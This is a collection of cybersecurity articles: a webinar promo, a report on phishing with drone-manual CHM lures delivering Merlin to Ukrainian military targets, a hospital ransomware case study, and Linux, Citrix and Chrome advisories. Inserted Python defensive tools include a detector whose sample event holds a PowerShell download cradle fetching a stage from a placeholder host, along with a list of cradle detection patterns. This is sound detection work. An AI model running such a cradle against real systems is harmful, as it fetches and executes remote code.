Harnessing AI Defenses Against AI-Powered Risks

Sep 25, 2023 | The Hacker News | Artificial Intelligence / Cybersecurity

Generative AI is a double-edged sword, if there ever was one. There is broad agreement that tools like ChatGPT are unleashing waves of productivity across the business, from IT, to customer experience, to engineering. That’s on the one hand.

On the other end of this fencing match: risk. From IP leakage and data privacy risks to the empowering of cybercriminals with AI tools, generative AI presents enterprises with concrete concerns. For example, the mass availability of AI tools was the second most-reported Q2 risk among senior enterprise risk executives — appearing in the top 10 for the first time — according to a Gartner survey.

In this escalating AI arms race, how can enterprises separate fact from hype and comprehensively manage generative AI risk while accelerating productivity?

Register here and join Zscaler’s Will Seaton, Product Marketing Manager, ThreatLabz, to:

  • Uncover the tangible risks of generative AI, both from employees’ use of AI tools and from threat actors who benefit from the increased speed, sophistication, and scale of attacks that gen AI enables.
  • Learn how Zscaler has approached internal AI tool controls.
  • Discover how AI-powered innovation like Zscaler’s AI-powered Cloud Sandbox and ML-driven automatic data classification can help secure your enterprise from unknown AI-enabled threats and prevent your data from being leaked or exfiltrated.
  • See how powerful new AI-based tools like Zscaler Risk360 enable you to visualize, quantify, and remediate cybersecurity risk comprehensively, including the financial impact of your security efforts.

Why Attend?

This will not be the first time you’ve heard about generative AI — far from it — and many of you may even be experts in prompt engineering. However, this is a fantastic opportunity to learn new insights from an organization where AI and ML innovation has been a core competency of the platform for many years.

  • Cut through the AI hype and glean insights from the world’s largest security cloud and our world-class threat research organization, ThreatLabz.
  • Benefit from practical, grounded best practices to secure your workforce, including using cloud application controls, browser isolation, and DLP policy to secure AI applications while unleashing the full potential of generative AI.
  • Learn how AI-driven innovation can help you to comprehensively and quantifiably manage enterprise risk, shrink your attack surface, gain prioritized, actionable steps to measurably improve your security posture, quantify the financial impact of security improvements, and much more.
  • Look at new and upcoming AI-powered innovation at Zscaler, including products like Risk360, Multimodal DLP, and Zscaler Security Autopilot with Breach Prediction.

Tap into our security expertise to learn more about how AI-powered innovation at Zscaler can help you unleash the full potential of generative AI, while keeping your data, applications, and users secure. Register for the webinar on October 2nd.


Ukrainian Military Targeted in Phishing Campaign Leveraging Drone Manuals

Sep 25, 2023 | THN | Cyber Attack / Phishing

Ukrainian military entities are the target of a phishing campaign that leverages drone manuals as lures to deliver a Go-based open-source post-exploitation toolkit called Merlin.

“Since drones or Unmanned Aerial Vehicles (UAVs) have been an integral tool used by the Ukrainian military, malware-laced lure files themed as UAVs service manuals have begun to surface,” Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

The cybersecurity company is tracking the campaign under the name STARK#VORTEX.

The starting point of the attack is a Microsoft Compiled HTML Help (CHM) file. When opened, it runs malicious JavaScript embedded in one of its HTML pages, which in turn executes PowerShell code that contacts a remote server to fetch an obfuscated binary.

The Windows-based payload is decoded to extract the Merlin Agent, which, in turn, is configured to communicate with a command-and-control (C2) server for post-exploitation actions, effectively seizing control over the host.
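The chain above (a CHM opened by the Windows help viewer, an embedded script, a PowerShell download cradle, a staged binary) is visible in process-creation telemetry. The following is an added example, not code from Securonix or The Hacker News: it runs three detection rules over constructed events shaped like Sysmon Event ID 1 records (the Image, ParentImage and CommandLine field names are Sysmon's; the sample values, the pattern lists and the example.invalid URL are assumptions). It flags hh.exe opening a .chm from a download or temp path, hh.exe spawning a script host or shell, and a PowerShell command line carrying two or more download-cradle markers.

```python
"""Flag the CHM -> embedded script -> PowerShell download-cradle chain in process-creation events.

Added example, not code from the report. Event records are constructed in the shape of
Sysmon Event ID 1 fields; the pattern lists below are assumptions drawn from common
download-cradle syntax, not indicators taken from the campaign.
"""
import re
from dataclasses import dataclass

# hh.exe is the Windows viewer for .chm files; it has no legitimate reason to spawn these.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}

# Fragments common to PowerShell download cradles and evasion flags (assumed list).
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"\biex\b", r"invoke-expression", r"frombase64string",
    r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", r"-w(indowstyle)?\s+hidden",
    r"-ep\s+bypass", r"-executionpolicy\s+bypass",
)]

# A help file that arrived by mail sits in a user-writable path, not an install directory.
USER_PATH_CHM = re.compile(r'\\(downloads|temp|appdata)\\[^\s"]*\.chm\b', re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return a Finding for every event that matches one of the three rules."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        pid = int(ev.get("ProcessId", 0))

        # Rule 1: the help viewer opened a .chm from a download/temp location.
        if image == "hh.exe" and USER_PATH_CHM.search(cmd):
            findings.append(Finding("chm_opened_from_user_path", pid, cmd))

        # Rule 2: the help viewer spawned a script host or shell.
        if parent == "hh.exe" and image in SUSPICIOUS_CHILDREN:
            findings.append(Finding("chm_spawns_interpreter", pid, f"hh.exe -> {image}"))

        # Rule 3: PowerShell command line carries two or more cradle markers.
        if image in ("powershell.exe", "pwsh.exe"):
            hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmd)]
            if len(hits) >= 2:
                findings.append(Finding("powershell_download_cradle", pid, "; ".join(hits)))
    return findings


# Constructed sample events (not from the report); example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\oper\Downloads\UAV-service-manual.chm'},
    {"ProcessId": 4188,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient)"
                    r".DownloadString('http://example.invalid/stage2')"},
    {"ProcessId": 5000,  # routine admin use; must not fire
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Run it as a script to print the findings, or pass real events to analyze(). Requiring two cradle markers keeps ordinary administrative PowerShell, like the third sample event, from firing; the hh.exe parent-child rule is the one that most directly captures what the report describes and is the least noisy of the three.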

“While the attack chain is quite simple, the attackers leveraged some pretty complex TTPs and obfuscation methods in order to evade detection,” the researchers said.

This is not the first time Ukrainian government organizations have been targeted using Merlin. In early August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain that employed CHM files as decoys to infect computers with the open-source tool.

CERT-UA attributed the intrusions to a threat actor it monitors under the name UAC-0154.

“Files and documents used in the attack chain are very capable of bypassing defenses,” the researchers explained.


“Typically receiving a Microsoft help file over the internet would be considered unusual. However, the attackers framed the lure documents to appear as something an unsuspecting victim might expect to appear in a help-themed document or file.”

The development arrives weeks after the CERT-UA said it detected an unsuccessful cyber attack against an unnamed critical energy infrastructure facility in the country undertaken by the Russian state-sponsored crew called APT28.


Fortified Health Security Releases 2023 Mid-Year Horizon Report

FRANKLIN, Tenn. – July 18, 2023 – Fortified Health Security (Fortified), a Best in KLAS managed security services provider (MSSP) specializing in healthcare cybersecurity, announced the release today of its highly anticipated 2023 Mid-Year Horizon Report. The report delves into the significant cybersecurity challenges impacting the healthcare industry, and provides valuable insights to help healthcare organizations protect patient data and strengthen their security posture.

The first half of 2023 has presented hospitals and health systems with a multitude of challenges, including staffing and budget constraints, technological limitations, and cybersecurity risks. As healthcare facilities strive to ensure patient safety and data protection, the federal government has taken notice and is actively working on legislative initiatives to address these pressing issues.

“Data breaches are a growing concern in the healthcare industry, affecting millions of individuals,” said Dan L. Dodson, CEO of Fortified Health Security. “Our Mid-Year Horizon Report unpacks some of what we and others in our industry have observed since the beginning of the year, and offers recommendations for how we can work together to create a more secure healthcare ecosystem.”

The report covers a range of critical topics in healthcare cybersecurity, including:

  • Mid-year data breach statistics and trends
  • Legislative progress and priorities
  • Data theft and covert tactics
  • The promise and pitfalls of AI and ChatGPT
  • Risk-based identity alerting

The 2023 Mid-Year Horizon Report reveals notable facts, such as the alarming increase in reported data breaches. Since the beginning of 2023, the U.S. Department of Health and Human Services has received reports of nearly 250 breaches, affecting more than 24 million individuals, representing a 56% increase compared to the same period in 2022.

The report also features a contribution from Fortified’s Senior Virtual Information Security Officer, Kate Pierce, who testified before the U.S. Senate’s Homeland Security and Government Affairs Committee. Her insights shed light on the cybersecurity risks faced by healthcare organizations, particularly smaller and rural ones, and provide proactive recommendations that may help mitigate these threats.

“We believe that by working together, leveraging educational initiatives, and embracing the resources available, we can forge a more secure future for the healthcare industry and ensure the well-being of patients,” added Dodson.

The full report is available for download here.

About Fortified Health Security

Fortified is Healthcare’s Cybersecurity Partner® – protecting patient data and reducing risk throughout the healthcare ecosystem. A managed security service provider that has been awarded numerous industry accolades, Fortified works alongside healthcare organizations to build customized programs that help clients leverage their prior security investments and current processes while implementing new solutions that reduce risk and increase their security posture over time. Led by a team of industry-recognized cyber experts, Fortified’s high-touch engagements and client-specific process maximize value and deliver an actionable, scalable approach to help reduce the risk of cyber events. To learn more, visit www.fortifiedhealthsecurity.com.

Press contact information: 

Denise Reed
Fortified Health Security
dreed@FortifiedHealthSecurity.com

Tom Testa 
Anderson Interactive 
tom@andersoni.com  


Real Hospital Ransomware Attack | Fortified Health Security

In television dramas and Hollywood movies, ransomware attacks are often made known by a flashy message that pops up on the computer screen or an ominous voice message left by the cyber criminal.

In the case of one hospital, the incident presented itself far more subtly.

Around 5:00 pm, the day after a holiday, calls started coming into the hospital’s IT team that an application was down. Then another. Followed by another.

Initially, the hospital’s IT team assumed they were dealing with a power issue and started investigating. It wasn’t until they stumbled upon the ransom note, hidden in a simple text file, that they realized their hospital had fallen prey to a ransomware attack.

Decisions, diversions, and disruptions   

Because the team had no idea how widespread the attack was or what they were dealing with, they made the difficult but necessary decision to shut down all the hospital’s servers. In a non-hospital setting, this decision certainly isn’t easy, but in a hospital environment, it’s especially precarious as patient care and safety can be impacted.

What’s more, shutting down systems often means that patients need to be diverted to other healthcare facilities, further disrupting care. While patient care was able to continue, it did so in a delayed capacity. This slowdown also affected the emergency department, leading to backlogs in its intake process.

Communications

Internal communication challenges compounded the situation. With the phone and email systems down (the primary methods hospital staff relied on to reach their colleagues), communication became difficult, as few people had access to alternative phone numbers.

The stakeholders working to respond to the cyber attack established a command center to enable better communication and coordination. This helped them address multiple issues simultaneously, including contacting vendors, the cyber insurance provider, legal, and law enforcement.

Vendors

At the time of the incident, a third-party vendor hosted the hospital’s electronic medical records (EMR). To help preserve those records and protect the vendor, the IT team severed the connection and informed the EMR administrator. They also took similar actions for any other vendors connected to their systems.

Some vendors engaged to provide response and recovery assistance added an unexpected layer of complexity to the incident by insisting on getting an updated contract in place before moving forward with support. Others immediately provided the hospital with whatever help it needed, on the mutual understanding that a contract reflecting the support would be addressed once the hospital had gotten past the incident.

Cyber Insurance

Initially, the hospital team was unable to get hold of its cyber insurance provider. Because its systems were down, it did not have access to the provider’s after-hours phone number. Fortunately, a few team members had had the foresight to save some vendor contacts on their personal mobile devices and were able to reach the cyber insurance provider and other vendors for assistance.

Once the cyber insurance provider got involved, they were able to use their expertise and resources to help the hospital team navigate the complex landscape of a ransomware incident and get them on the path to recovery.

Legal

The cyber insurance company also provided the hospital with a lawyer experienced in ransomware incidents and coordinating the nuanced communication components.

Something that surprised the IT team was the executive team’s direction to restore the phone system first. The team’s initial thought was to restore the EMR connection and other critical systems, but once the IT team synchronized with the executive leadership team, it became clear how critical accessible and streamlined communication is to a ransomware recovery effort.

In addition to keeping internal staff informed, it was imperative to communicate the situation effectively to the community and ensure that they could reach the hospital when necessary. To achieve this, the legal team collaborated with the hospital’s marketing and compliance departments to devise a communication and messaging strategy. The legal team also played a pivotal role in crafting response letters to vendors and handling any legal implications that arose during the incident.

Law enforcement

The hospital notified both the Federal Bureau of Investigation (FBI) and local law enforcement about the incident. The FBI provided primary support for the hospital since most local law enforcement agencies lacked a cyber response team.

Ransomware attack lessons and learnings

Despite the challenges, the ransomware incident provided valuable opportunities for learning and growth, leading the hospital to adopt a much stronger cybersecurity posture.

Fortified Health Security infographic of 7 key takeaways from a hospital ransomware attack


Takeaway 1: Prepare for the worst, hope for the best

With healthcare ransomware attacks on the rise, it’s essential to accept the possibility that your hospital or health system will be hit by one. By taking proactive measures to strengthen your defenses, and making your cybersecurity program a top priority within your organization, you’ll be in a stronger position to control and successfully navigate the situation.

For example, conduct regular tabletop exercises. In cybersecurity, experts design tabletop exercises to mimic a real-life cybersecurity incident without affecting the organization’s live systems. The objective is to help organizations assess and improve incident response and cybersecurity readiness.

Involving the entire organization in incident response and recovery planning is imperative. Ransomware incidents impact the entire organization, and a collaborative approach ensures a coordinated and swift response.

Takeaway 2: Understand the scope and scale of your cybersecurity insurance

Cyber insurance goes beyond financial assistance, offering expertise, guidance, and resources that can prove invaluable during a crisis. It’s also likely that your cyber insurance provider will be of more assistance than you might realize. To avoid duplicating efforts and save time, know what your cyber insurance covers. This insight will help you focus on identifying gaps that your internal team or partners need to address.

Takeaway 3: Have backups for your backups

Don’t underestimate the importance of having backup systems in place and maintaining up-to-date documentation. Backup systems should be comprehensive and regularly tested to ensure reliability.

For example, having a non-electronic backup of vendor and staff contact lists is an often-overlooked aspect of incident response. Creating this list, maintaining it, and ensuring that it’s easily accessible can help ensure communication channels remain open during incidents, even when digital systems are compromised.

Takeaway 4: Supplement your resources

Having good, reliable partners in place who can come to your aid when you need it is priceless during a ransomware attack. Many organizations will have a 24/7 help desk, but they typically don’t have 24/7 server and network administrators, or security analysts.

Even during a cyber attack, when your systems are down, your staff will have to sleep at some point. Having pre-arranged support to cover additional shifts during a critical cyber event helps ensure your response and recovery aren’t slowed down.

Takeaway 5: Align on ransomware payment

In a ransomware incident, to pay or not to pay really is the question. Well in advance of an attack, internal cybersecurity stakeholders should create and align on the organization’s policy and plan around paying the ransom. Figuring that out during a ransomware incident is likely to result in unnecessary confusion and chaos.

Takeaway 6: Operationalize your system recovery process

After the ransomware attack, the hospital’s IT team faced an unexpected challenge. Although it had a pre-defined recovery order for the most critical systems, there was a lot of back-and-forth discussion about the order of recovery, and significant time was spent assembling the full system recovery order and getting executive-level input and approval.

Had the order of system recovery been outlined in advance, with executive sign-off, communications and expectations around recovery progress would have been clearer and the recovery itself would have moved faster.

Takeaway 7: Clarify your communication strategy

Ensure you have a well-defined, step-by-step communication strategy that extends throughout the entire organization, all the way to the executive level. Hospital staff will naturally seek updates and clarity about the ransomware situation and what lies ahead. While you may not have all the answers immediately, having a clear communication plan in place will help ensure staff, patients, and the community receive the support and reassurance they need during the challenging situation.

Resiliency after a ransomware attack

This real-life ransomware incident serves as a stark reminder of the critical importance of cybersecurity preparedness within hospitals and health systems. Proactive measures, such as comprehensive cybersecurity programs, cyber insurance coverage, and robust incident response planning, are vital to protect against the ever-evolving threats these organizations face.

To learn what steps the hospital took to recover from this ransomware attack, watch our on-demand webinar, From crisis to recovery: Lessons learned from a hospital’s ransomware attack.

 

Tamra Durfee is an experienced CISO with over 25 years in information security, compliance, regulatory risk, strategy, innovation, and technology transformation. For the past 8 years, she has specialized in healthcare cybersecurity and building risk-based medical device information security programs. She is a presenter at HIMSS, CHIME, CHA, and a healthcare security contributor to Healthcare IT News. Tamra holds certifications as a Certified Healthcare CIO (CHCIO), Certified Digital Healthcare Executive (CDH-E), GIAC Security Leadership Certification, Certified Professional in Healthcare Information Management Systems (CPHIMS), and IBM Certified Solutions Architect.


July 2023 cyber threats | Fortified Health Security

In July, cybercriminals increasingly targeted Linux systems and exploited new zero-day vulnerabilities in Citrix products. While threat actors never stop looking for new vulnerabilities to exploit, it’s worth noting that this surge in activity coincides with the industry’s habit of retiring software products in the fall. Both Microsoft and Google have products nearing end-of-life (EoL) status, which introduces exposures that require prompt attention.

Crippling Attacks Targeting Linux Systems  

A report from the Palo Alto Networks Unit 42™ research team reveals that from December 2022 to May 2023 there was a 50% increase in malicious files targeting Linux systems. High-profile groups such as Cl0p, Hive, and BlackCat now produce ransomware with Linux variants, and other Linux-capable families include REvil, Tycoon, QNAPcrypt, and DarkSide.

Linux’s open-source community has traditionally patched flaws quickly, which underpins its reputation for security, but the rise in Linux-targeted threats means that reputation cannot be taken for granted. It’s vital to intensify patching and hardening efforts for Unix/Linux systems; neglecting their security could lead to severe consequences.

Impacts on healthcare organizations 

Many vital systems, like those in hospitals, run on Linux. If hit with a ransomware attack, essential services necessary for patient care can be disrupted. And depending on the preparedness of the response team, recovery could take weeks or even months. Such attacks can tarnish the organization’s reputation, expose sensitive patient data, and lead to extortion attempts by the attackers.

Recommendations 

Users of Linux-based operating systems are advised to:

  • Scan *nix systems using credentialed scans, commonly provided in the form of SSH credentials
  • Patch and upgrade Linux operating systems identified as vulnerable
  • Check Linux/Unix system configurations for default or weak passwords, including for root users
  • Disable booting from external sources
  • Enable SELinux (set SELINUX=enforcing in the ‘/etc/selinux/config’ file)
  • Update repositories and applications
  • Avoid using unencrypted protocols on any operating system
  • Encrypt data transfers
  • Disable remote root login and unwanted services, and assign complex passwords to root accounts
  • Close unused ports
  • Treat minority operating systems such as Linux with the same patching and monitoring rigor as the Windows majority
     
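Several of the items above can be checked mechanically from configuration that a credentialed scan already collects. The following is an added example, not a Fortified tool: it reads the text of /etc/selinux/config, sshd_config, a `ss -tulnp` listing and /etc/shadow (all constructed samples embedded in the block) and reports where the host deviates from the recommendations. The allow-list of expected listening ports and the table of cleartext services are assumptions for the demonstration.

```python
"""Audit captured Linux configuration against the hardening items above.

Added example, not Fortified's tooling. All inputs below are constructed samples; the
cleartext-service table and the port allow-list are assumptions for the demonstration.
"""
import re

# Listeners on these ports imply an unencrypted protocol (assumed table).
CLEARTEXT_SERVICES = {21: "ftp", 23: "telnet", 69: "tftp", 512: "rexec", 513: "rlogin", 514: "rsh"}


def parse_selinux_config(text):
    """KEY=VALUE lines; comments ignored, last assignment wins."""
    cfg = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, val = line.split("=", 1)
            cfg[key.strip().upper()] = val.strip().strip('"').lower()
    return cfg


def parse_sshd_config(text):
    """sshd honours the first occurrence of a keyword, so the first value seen is kept."""
    cfg = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        cfg.setdefault(parts[0].lower(), parts[1].strip().lower() if len(parts) > 1 else "")
    return cfg


def parse_listening(ss_text):
    """(proto, port, process) tuples from `ss -tulnp` output; the header line is skipped."""
    out = []
    for line in ss_text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 6:
            continue
        port = int(cols[4].rsplit(":", 1)[1])  # Local Address:Port column
        m = re.search(r'users:\(\("([^"]+)"', line)
        out.append((cols[0], port, m.group(1) if m else "?"))
    return out


def audit(selinux_text, sshd_text, ss_text, shadow_text, allowed_ports):
    """Return a list of (code, detail) findings."""
    findings = []
    se = parse_selinux_config(selinux_text)
    if se.get("SELINUX") != "enforcing":
        findings.append(("selinux_not_enforcing", f"SELINUX={se.get('SELINUX', '<unset>')}"))

    ssh = parse_sshd_config(sshd_text)
    # OpenSSH's default is prohibit-password, which still permits key-based root login.
    if ssh.get("permitrootlogin", "prohibit-password") != "no":
        findings.append(("ssh_root_login", f"PermitRootLogin {ssh.get('permitrootlogin', '<default>')}"))

    for proto, port, proc in parse_listening(ss_text):
        if port in CLEARTEXT_SERVICES:
            findings.append(("cleartext_service", f"{CLEARTEXT_SERVICES[port]} on {proto}/{port} ({proc})"))
        if port not in allowed_ports:
            findings.append(("unexpected_port", f"{proto}/{port} ({proc}) not in allow-list"))

    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[1] == "":  # empty hash field = no password at all
            findings.append(("empty_password", f"account {fields[0]} has no password set"))
    return findings


# Constructed samples (not from any real host).
SAMPLE_SELINUX = "# constructed\nSELINUX=permissive\nSELINUXTYPE=targeted\n"
SAMPLE_SSHD = "# constructed\nPort 22\nPermitRootLogin yes\nPermitRootLogin no\n"
SAMPLE_SS = """Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      5            0.0.0.0:23        0.0.0.0:*     users:(("in.telnetd",pid=901,fd=4))
tcp   LISTEN 0      4096         0.0.0.0:111       0.0.0.0:*     users:(("rpcbind",pid=640,fd=4))
"""
SAMPLE_SHADOW = ("root:$6$saltsalt$hashhash:19500:0:99999:7:::\n"
                 "svc:!:19500:0:99999:7:::\n"
                 "legacy::19500:0:99999:7:::\n")


def run_sample():
    return audit(SAMPLE_SELINUX, SAMPLE_SSHD, SAMPLE_SS, SAMPLE_SHADOW, allowed_ports={22})


if __name__ == "__main__":
    for code, detail in run_sample():
        print(f"{code}: {detail}")
```

Note the sshd parser deliberately keeps the first PermitRootLogin value: in the sample a later "PermitRootLogin no" does not override the earlier "yes", which mirrors how sshd itself reads the file and is a common way a hardening change silently fails to take effect.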

Citrix ADC and Gateway Appliances Zero-days 

On July 18, 2023, Citrix published a security bulletin announcing fixes for three new vulnerabilities. These are new vulnerabilities and should not be confused with vulnerabilities reported with the same Citrix systems by Fortified in May 2023.

The new vulnerabilities allow for unauthenticated remote code execution, privilege escalation to the root administrator account, and reflected cross-site scripting. Successful attacks could allow data exfiltration or ransomware deployment, compromising protected health information (PHI) and patient care, or causing system downtime.

Cloud Software Group is urging customers to upgrade affected systems as soon as possible, as these vulnerabilities are being actively exploited by threat actors. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action, though confirmation with the vendor is recommended. 

Affected products/versions 
NetScaler ADC and NetScaler Gateway 12.1 are now end-of-life (EoL) and remain vulnerable; upgrade to a supported release.

  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 
  • NetScaler ADC 13.1-FIPS before 13.1-37.159 
  • NetScaler ADC 12.1-FIPS before 12.1-55.297 
  • NetScaler ADC 12.1-NDcPP before 12.1-55.297 

Vulnerabilities 

  • CVE-2023-3519: Unauthenticated remote code execution; known to be actively exploited by threat actors 
  • CVE-2023-3467: Privilege escalation to root administrator (nsroot) 
  • CVE-2023-3466: Reflected cross-site scripting (XSS) 

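To apply the version list above across a fleet rather than one appliance at a time, the following is an added example, not Citrix tooling: it compares a NetScaler build string against the fixed builds transcribed from the bulletin summary above, treats the 12.1 branch as end-of-life, and returns the vulnerable hosts from a constructed inventory (the hostnames and builds are invented). The FIPS/NDcPP variant must be supplied separately because those builds form their own branches with their own fixed builds.

```python
"""Decide whether a NetScaler ADC/Gateway build is below the fixed builds listed above.

Added example, not Citrix tooling. FIXED_BUILDS is transcribed from the bulletin summary
above; the sample inventory (hostnames, builds, variants) is constructed.
"""
import re

FIXED_BUILDS = {
    ("13.1", None): "13.1-49.13",
    ("13.0", None): "13.0-91.13",
    ("13.1", "FIPS"): "13.1-37.159",
    ("12.1", "FIPS"): "12.1-55.297",
    ("12.1", "NDcPP"): "12.1-55.297",
}
END_OF_LIFE = {("12.1", None)}  # standard 12.1 is EoL; the only remedy is to move off it

# Accepts "13.1-49.13" as well as the appliance's "NS13.1: Build 49.13.nc" form.
_VERSION = re.compile(r"(\d+)\.(\d+)\D+?(\d+)\.(\d+)")


def parse_build(text):
    """Return (major, minor, build, sub) as integers so builds compare as tuples."""
    m = _VERSION.search(text)
    if not m:
        raise ValueError(f"unrecognised NetScaler version string: {text!r}")
    return tuple(int(g) for g in m.groups())


def assess(version, variant=None):
    """Return (vulnerable, reason) for one appliance; variant is None, 'FIPS' or 'NDcPP'."""
    major, minor, build, sub = parse_build(version)
    branch = (f"{major}.{minor}", variant)
    if branch in END_OF_LIFE:
        return True, f"{branch[0]} is end-of-life; migrate to a supported release"
    fixed = FIXED_BUILDS.get(branch)
    if fixed is None:
        return True, f"branch {branch[0]} ({variant or 'standard'}) is not in the bulletin; confirm with the vendor"
    if (major, minor, build, sub) < parse_build(fixed):
        return True, f"build {build}.{sub} is below fixed build {fixed}"
    return False, f"build {build}.{sub} is at or above fixed build {fixed}"


def vulnerable_hosts(inventory):
    """inventory: iterable of (hostname, version, variant) -> [(hostname, reason), ...]."""
    out = []
    for host, version, variant in inventory:
        vulnerable, reason = assess(version, variant)
        if vulnerable:
            out.append((host, reason))
    return out


# Constructed inventory; none of these hosts exist.
SAMPLE_INVENTORY = [
    ("adc-dmz-01", "NS13.1: Build 48.47.nc", None),
    ("adc-dmz-02", "13.1-49.13", None),
    ("gw-core-01", "13.0-90.12", None),
    ("adc-fips-01", "13.1-37.150", "FIPS"),
    ("adc-legacy-01", "12.1-65.25", None),
    ("adc-cc-01", "12.1-55.297", "NDcPP"),
]

if __name__ == "__main__":
    for host, reason in vulnerable_hosts(SAMPLE_INVENTORY):
        print(f"{host}: {reason}")
```

An unknown branch is reported as vulnerable rather than silently skipped, which is the safe default when an inventory contains builds the bulletin does not mention.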
Recommendations 

  • Review all Citrix ADC and Gateway appliances to ensure they are running the latest firmware versions 
  • Include Citrix appliances in routine vulnerability threat management (VTM) scanning, with proper credentials applied 
  • Review all accounts with access to Citrix resources and disable those for which access is not necessary 
  • Consider a policy that disables or restricts user accounts that have not actively used these resources for a set period (30-90 days is common) 
     

Google Chrome Sunsetting on Old Windows Systems 

Google Chrome and Microsoft Edge are ending support for Windows 7, Windows 8/8.1, Windows Server 2012, and Windows Server 2012 R2. Left unmitigated, a browser that no longer receives security fixes on an out-of-date operating system gives attackers a wide target. Many health systems still run those OSs, which exposes them to compromised data, compatibility issues, poor performance, and stolen passwords.

Google will require Windows 10 or later, or Windows Server 2016 or later to keep Google Chrome up to date. Due to this, Chrome 109 is the last version of Chrome that will support those older OSs. To ease customer transitions, Google will issue critical severity security fixes and fixes for bugs for Chrome 109 on these OSs until October 10, 2023.

This decision by Google also affects Chromium-based Edge. Microsoft Edge browser version 109 and WebView2 Runtime version 109 will be the last respective versions for the same listed OSs. Edge will receive critical security fixes and fixes for known exploit bugs until October 10, 2023. 

Affected products/versions 
Google Chrome/Edge on the below Operating Systems 

  • Windows 7 
  • Windows 8/8.1 
  • Windows Server 2012  
  • Windows Server 2012 R2

Recommendations 

It’s imperative to review the various applications used in the hospital, as some may depend on a specific browser version, and these changes may affect their functionality. 

  • Upgrade affected OSs 
  • Remove Chrome and Edge from affected OSs 
  • Install Mozilla Firefox ESR on systems that cannot be upgraded, since Firefox ESR on Windows 7/8 will continue receiving updates until September 2024 
  • Re-evaluate the need for browsers and general internet access on machines with EoL OSs

Healthcare is the leading sector for ransomware incidents. If your health system is ever faced with a cyber incident, learn how to navigate it and better protect your network in our on-demand webinar, From crisis to recovery: Lessons learned from a hospital’s ransomware attack. 
